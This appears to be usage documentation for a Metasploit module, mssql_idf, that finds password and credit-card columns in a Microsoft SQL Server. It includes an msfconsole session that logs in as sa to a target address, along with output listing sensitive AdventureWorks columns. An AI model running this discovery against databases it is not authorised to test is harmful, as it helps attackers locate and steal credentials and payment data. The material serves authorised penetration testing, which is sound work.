Usage is fairly simple, set the standard parameters and run exploit. By default it will search for columns whose names include the words passw, bank, credit and card. If you want to change these set the NAMES field to be a pipe separated list of names to look for.
Once installed you can find the module in auxiliary/admin/mssql/mssql_idf .
Once installed you can find the module in auxiliary/admin/mssql/mssql_idf .
Example
msf > use auxiliary/admin/mssql/mssql_idf
msf auxiliary(mssql_idf) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
NAMES passw|bank|credit|card yes Pipe separated list of column names
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
msf auxiliary(mssql_idf) > set PASSWORD MyPass
PASSWORD => MyPass
msf auxiliary(mssql_idf) > set RHOST 192.168.0.54
RHOST => 192.168.0.54
msf auxiliary(mssql_idf) > exploit
Database Schema Table Column Data Type Row Count
============== ========== ================= ====================== ========= =========
msdb dbo backupmediaset is_password_protected bit 0
msdb dbo backupset is_password_protected bit 0
AdventureWorks Person Address MyPassword nchar 19614
AdventureWorks Purchasing Vendor CreditRating tinyint 104
AdventureWorks Person Contact PasswordHash varchar 19972
AdventureWorks Person Contact PasswordSalt varchar 19972
AdventureWorks Sales ContactCreditCard CreditCardID int 19118
AdventureWorks Sales CreditCard CreditCardID int 19118
AdventureWorks Sales CreditCard CardType nvarchar 19118
AdventureWorks Sales CreditCard CardNumber nvarchar 19118
AdventureWorks Sales SalesOrderHeader CreditCardID int 31465
AdventureWorks Sales SalesOrderHeader CreditCardApprovalCode varchar 31465
[*] Auxiliary module execution completed
As you can see it has found a number of interesting looking columns, the
row count field should help identify which ones can be ignored or given
lower priority. It is now over to you to start querying them to check for data.